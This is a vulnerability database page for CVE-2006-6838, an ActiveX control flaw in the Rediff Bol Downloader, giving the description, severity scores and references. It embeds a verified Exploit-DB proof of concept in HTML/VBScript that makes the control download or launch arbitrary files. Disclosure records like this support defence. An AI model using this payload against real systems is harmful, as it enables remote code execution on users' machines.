CVE-2006-6838 : Detail

CVE-2006-6838

3.36%V3
Network
2007-01-03
01h00 +00:00
2018-10-17
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Rediff Bol Downloader ActiveX (OCX) control allows remote attackers to execute arbitrary files, and obtain sensitive information (usernames and pathnames), via a URL in the url vbscript parameter.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 3058

Publication date : 2006-12-30 23h00 +00:00
Author : Gregory R. Panakkal
EDB Verified : Yes

<!-- Rediff Bol Downloader ActiveX Allows Downloading and Spawning Arbitary Files ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Affected Program : Rediff Bol Download ActiveX ActiveX (OCX) Control that downloads the Rediff Bol Messenger setup and spawns it. Related URL : http://messenger.rediff.com/newbol/ Discovered by : Gregory R. Panakkal Vulnerability Description : Rediff Bol Downloader ActiveX control allows any webpage to download and spawn file. These file can be of any type. No filtering is done. IE Displays an alert, if the code points to a executable file on the internet. But execution of local files displays no alert. Tested On : * IE 7.0.5730.11 (WinXP SP2) * IE 6.0.2900.2180 (WinXP SP2) --> <html> <body> <OBJECT id="rboldwn" WIDTH=445 HEIGHT=40 classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03" codebase="http://imdownloads.rediff.com/newbol/Bol.CAB"> </OBJECT> <script language="vbscript"> rboldwn.url = "file://C:/WINNT/Notepad.exe" rboldwn.fontsize = 14 rboldwn.barcolor = EE4E00 rboldwn.start = "start" </script> </body> </html> # milw0rm.com [2006-12-31]

Products Mentioned

Configuraton 0

Rediff>>Bol_downloader_activex_ocx_control >> Version *

    References

    http://securityreason.com/securityalert/2089
    Tags : third-party-advisory, x_refsource_SREASON
    http://www.securityfocus.com/bid/21831
    Tags : vdb-entry, x_refsource_BID